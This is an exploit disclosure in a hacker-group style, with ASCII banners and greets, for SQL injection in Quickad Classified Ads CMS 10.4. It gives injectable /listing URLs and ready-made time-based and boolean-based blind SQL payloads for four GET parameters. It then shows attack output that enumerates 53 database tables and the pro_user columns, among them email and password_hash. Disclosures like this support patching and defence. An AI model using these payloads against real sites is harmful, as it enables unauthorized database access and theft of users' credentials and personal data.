┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://bylancer.com/ │ │ Vendor : Bylancer │ │ Software : Quickad Classified Ads CMS 10.4 │ │ Vuln Type: SQL Injection │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ SQL injection attacks can allow unauthorized access to sensitive data, modification of │ │ data and crash the application or make it unavailable, leading to lost revenue and │ │ damage to a company's reputation. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09 CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /listing https://website/listing?location=Beirut&latitude=&longitude=&placetype=city&placeid=[SQLI]&keywords=[SQLI]&cat=&subcat= https://website/listing?keywords=[SQLI]&location=Beirut&placetype=city&placeid=[SQLI]&cat=1&subcat=&filter=&sort=Newest&order=DESC&custom%5B15%5D=&range1=[SQLI]&range2=[SQLI] GET parameter 'range1' is vulnerable to SQL Injection --- Parameter: range1 (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: keywords=&location=Beirut&placetype=city&placeid=276781&cat=&subcat=&filter=&sort=Newest&order=DESC&range1=1 AND (SELECT 3133 FROM (SELECT(SLEEP(5)))crfu)&range2=1 --- GET parameter 'range2' is vulnerable to SQL Injection --- Parameter: range2 (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: keywords=&location=Beirut&placetype=city&placeid=276781&cat=&subcat=&filter=&sort=Newest&order=DESC&range1=1&range2=1) AND (SELECT 7411 FROM (SELECT(SLEEP(5)))iiGu)-- jHQy --- GET parameter 'placeid' is vulnerable to SQL Injection --- Parameter: placeid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: location=Beirut&latitude=&longitude=&placetype=city&placeid=276781') AND 3510=3510 AND ('DiTr'='DiTr&keywords=&cat=&subcat= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: location=Beirut&latitude=&longitude=&placetype=city&placeid=276781') AND (SELECT 2494 FROM (SELECT(SLEEP(5)))FKvp) AND ('WPrM'='WPrM&keywords=&cat=&subcat= --- GET parameter 'keywords' is vulnerable to SQL Injection --- Parameter: keywords (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: location=Beirut&latitude=1&longitude=1&placetype=city&placeid=276781&keywords=1'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&cat=1&subcat=1 --- [+] Starting the Attack fetching current database current database: 'classified_******' fetching tables [53 tables] +---------------------------+ | ad_custom_fields | | ad_product | | pro_admins | | pro_adsense | | pro_balance | | pro_blog | | pro_blog_cat_relation | | pro_blog_categories | | pro_blog_comment | | pro_catagory_main | | pro_catagory_sub | | pro_category_translation | | pro_cities | | pro_countries | | pro_currencies | | pro_custom_data | | pro_custom_fields | | pro_custom_options | | pro_emailq | | pro_faq_entries | | pro_favads | | pro_firebase_device_token | | pro_languages | | pro_login_attempts | | pro_logs | | pro_messages | | pro_mobile_numbers | | pro_notification | | pro_options | | pro_pages | | pro_payments | | pro_plan_options | | pro_plans | | pro_product | | pro_product_resubmit | | pro_push_notification | | pro_qbm_banners | | pro_qbm_log | | pro_qbm_options | | pro_qbm_transactions | | pro_qbm_types | | pro_reviews | | pro_subadmin1 | | pro_subadmin2 | | pro_subscriptions | | pro_taxes | | pro_testimonials | | pro_time_zones | | pro_transaction | | pro_upgrades | | pro_user | | pro_user_options | | pro_usergroups | +---------------------------+ fetching columns from Table 'pro_user' [36 columns] +----------------+----------------------------------------+ | Column | Type | +----------------+----------------------------------------+ | description | text | | name | varchar(225) | | status | enum('0','1','2') | | view | int(11) | | address | varchar(255) | | city | varchar(225) | | confirm | varchar(255) | | country | varchar(50) | | created_at | datetime | | email | varchar(255) | | facebook | varchar(255) | | forgot | varchar(255) | | googleplus | varchar(255) | | group_id | int(11) | | id | int(11) | | image | varchar(225) | | instagram | varchar(255) | | lastactive | datetime | | linkedin | varchar(255) | | notify | enum('0','1') | | notify_cat | varchar(255) | | oauth_link | varchar(255) | | oauth_provider | enum('','facebook','google','twitter') | | oauth_uid | varchar(100) | | online | enum('0','1') | | password_hash | varchar(255) | | phone | varchar(255) | | postcode | varchar(255) | | sex | enum('Male','Female','Other') | | tagline | varchar(255) | | twitter | varchar(255) | | updated_at | datetime | | user_type | enum('user','seller') | | username | varchar(255) | | website | varchar(255) | | youtube | varchar(255) | +----------------+----------------------------------------+ [-] Done